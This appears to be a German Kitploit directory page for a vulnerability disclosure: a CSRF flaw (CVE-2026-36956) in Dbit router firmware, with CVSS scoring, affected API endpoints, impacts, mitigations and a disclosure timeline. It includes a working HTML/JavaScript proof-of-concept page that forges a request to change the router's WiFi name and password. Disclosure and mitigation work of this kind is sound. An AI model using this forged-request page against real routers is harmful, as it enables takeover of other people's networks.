Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-36956 — Proof-of-Concept für CVE-2026-36956, eine CSRF-Schwachstelle in der Dbit-Router-Firmware, die unbefugte Konfigurationsänderungen über gefälschte Anfragen ermöglicht. | Kitploit
Tools/GitHubGitHub/kirubel-cve/cve-2026-36956
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubkirubel-cve/cve-2026-36956

CVE-2026-36956

Proof-of-Concept für CVE-2026-36956, eine CSRF-Schwachstelle in der Dbit-Router-Firmware, die unbefugte Konfigurationsänderungen über gefälschte Anfragen ermöglicht.

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-36956: Cross-Site Request Forgery (CSRF) in der Web-Verwaltungsoberfläche

CVE-ID: CVE-2026-36956 Datum: 2026-04-29 Entdecker: Kirubel Solomne Hersteller: Shenzhen Dibit Network Equipment Co., Ltd. Produkt: Dbit Router Firmware-Version: V1.0.0 CWE: CWE-352 - Cross-Site Request Forgery (CSRF)


Beschreibung

Die Dbit-Router-Firmware V1.0.0 implementiert keine CSRF-Schutzmechanismen wie Anti-CSRF-Tokens oder eine strikte Origin-/Referer-Validierung auf administrativen API-Endpunkten. Ein Angreifer kann eine bösartige Webseite erstellen, die gefälschte HTTP-Anfragen an Konfigurationsendpunkte sendet. Wenn ein authentifizierter Administrator die bösartige Seite besucht, verarbeitet der Router die gefälschte Anfrage als legitime administrative Aktion.


CVSS-Score

CVSS v3.1-Score: 8.8 (Hoch) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

MetrikWert
AngriffsvektorNetzwerk
AngriffskomplexitätNiedrig
Erforderliche PrivilegienKeine
BenutzerinteraktionErforderlich
Auswirkung auf VertraulichkeitHoch
Auswirkung auf IntegritätHoch
Auswirkung auf VerfügbarkeitHoch

Betroffene Endpunkte

EndpunktFunktion
/api/setWlanDrahtlose Netzwerkkonfiguration (SSID, Passwort)
/api/setWanWAN-Konfiguration
/api/setSystemSystemkonfiguration

Proof of Concept

Speichern Sie Folgendes als poc.html und öffnen Sie es, während ein Administrator beim Router angemeldet ist:

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<script>
  fetch('http://192.168.10.1/api/setWlan', {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      ssid: "Hacked_Network",
      password: "attacker123"
    })
  });
</script>
</body>
</html>

Erwartetes Verhalten: Die Anfrage sollte aufgrund einer CSRF-Token-Abweichung abgelehnt werden. Tatsächliches Verhalten: Der Router akzeptiert und verarbeitet die gefälschte Anfrage.


Auswirkungen

  • Unbefugte Änderung von WiFi-SSID und -Passwort
  • Änderungen an der WAN-/DNS-Konfiguration
  • Denial of Service für legitime Benutzer
  • Vollständige Übernahme der Router-Konfiguration

Abhilfemaßnahmen

  • Implementierung von Anti-CSRF-Tokens auf allen zustandsändernden Endpunkten
  • Durchsetzung einer strikten Validierung der Origin- und Referer-Header
  • Verwendung des SameSite=Strict-Cookie-Attributs für Sitzungscookies

Offenlegungszeitplan

DatumEreignis
2026-04-29Schwachstelle entdeckt
2026-04-29An MITRE gemeldet
2026-04-29CVE-2026-36956 zugewiesen
2026-04-29Öffentliche Offenlegung

Referenzen

  • MITRE CVE-2026-36956
  • CWE-352
  • Hersteller-Website
Tool herunterladen